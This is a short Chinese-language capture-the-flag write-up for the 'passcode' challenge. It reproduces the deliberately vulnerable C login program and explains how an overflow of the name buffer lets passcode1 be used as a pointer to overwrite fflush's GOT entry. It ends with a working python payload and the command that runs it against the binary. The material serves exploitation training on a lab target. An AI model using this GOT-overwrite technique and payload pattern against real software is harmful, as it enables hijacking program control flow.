使用ssh连上服务器端后
使用ls查看目录
再用cat打开passcod.c(即passcode的源程序
#include <stdio.h>
#include <stdlib.h>
void login(){
int passcode1;
int passcode2;
printf("enter passcode1 : ");
scanf("%d", passcode1);
fflush(stdin);
// ha! mommy told me that 32bit is vulnerable to bruteforcing :)
printf("enter passcode2 : ");
scanf("%d", passcode2);
printf("checking...\n");
if(passcode1==338150 && passcode2==13371337){
printf("Login OK!\n");
system("/bin/cat flag");
}
else{
printf("Login Failed!\n");
exit(0);
}
}
void welcome(){
char name[100];
printf("enter you name : ");
scanf("%100s", name);
printf("Welcome %s!\n", name);
}
int main(){
printf("Toddler's Secure Login System 1.0 beta.\n");
welcome();
login();
// something after login...
printf("Now I can safely trust you that you have credential :)\n");
return 0;
}
发现scanf无法正常给passcode1,2赋值
利用scp把文件下载到本地(pwd查看路径
扔进ida里分析
发现利用name的栈溢出可以且仅可以给passcode1赋值(栈帧从高往低生长
在代码里passcode1实际上是作为指针来使用
于是利用fflush的跳转
jmp 地址1 地址1里存放的是地址2 于是会从地址2开始执行命令
(实质是模块间调用跳转时got表的使用
于是让passcode指向地址1,这样可以在把地址1里的地址2改为我们想要执行的语句的地址
即 “/bin/cat flag” (需看ida里的汇编指令
在dos中先在服务器端创建文件
再使用文件打开passcode
python -c "print 'a'*96+'\x04\xa0\x04\x08\n134514147\n'" > /tmp/tectest
./passcode < /tmp/tectest